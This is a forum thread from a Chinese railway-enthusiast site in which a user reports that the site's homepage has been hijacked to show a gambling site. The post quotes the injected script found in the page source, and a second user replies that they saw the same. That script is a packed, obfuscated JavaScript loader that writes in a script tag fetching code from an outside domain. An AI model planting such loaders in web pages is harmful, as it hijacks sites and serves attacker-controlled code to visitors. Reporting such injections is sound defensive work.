海子铁路网

 找回密码
 注册进站

QQ登录

只需一步,快速开始

查看: 6808|回复: 1

本站首页遭到劫持

[复制链接]
发表于 2019-5-15 13:48:07 | 显示全部楼层 |阅读模式
访问bbs.hasea.com和www.hasea.com时,网页会被来自www.c6300.com(一个奇怪的博彩网站)的内容覆盖。
经查,网页源代码被植入了如下的恶意脚本:
《script》
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('8.7(a(\'%9%6%0%3%1%4%0%5%h//g.j.i/f/c.b%1%2%e/d%2\'));',20,20,'3D|22|3E|22javascript|20src|22https|20language|write|document|3Cscript|unescape|js|squerytz|script|3C|tz|www|3A|com|oio00'.split('|'),0,{}))
《/script》

网站内页未受到影响。当我手动禁用JavaScript后,首页的访问恢复正常。

应该不是我接入的ISP发生的劫持,因为当我开了加密的全局梯子以后劫持仍然存在。

盼管理员尽快看到并解决。
发表于 2019-5-15 21:36:55 | 显示全部楼层
现在没事了吧?
前几天我这也被劫了

楼主代码都码上了,大牛
您需要登录后才可以回帖 登录 | 注册进站

本版积分规则

手机版|小黑屋|Archiver|海子铁路网 ( 京ICP证120035号 京公网安备11010702001036 )

GMT+8, 2024-12-23 10:40

Powered by Discuz! X3.4

© 2001-2017 Comsenz Inc.

快速回复 返回顶部 返回列表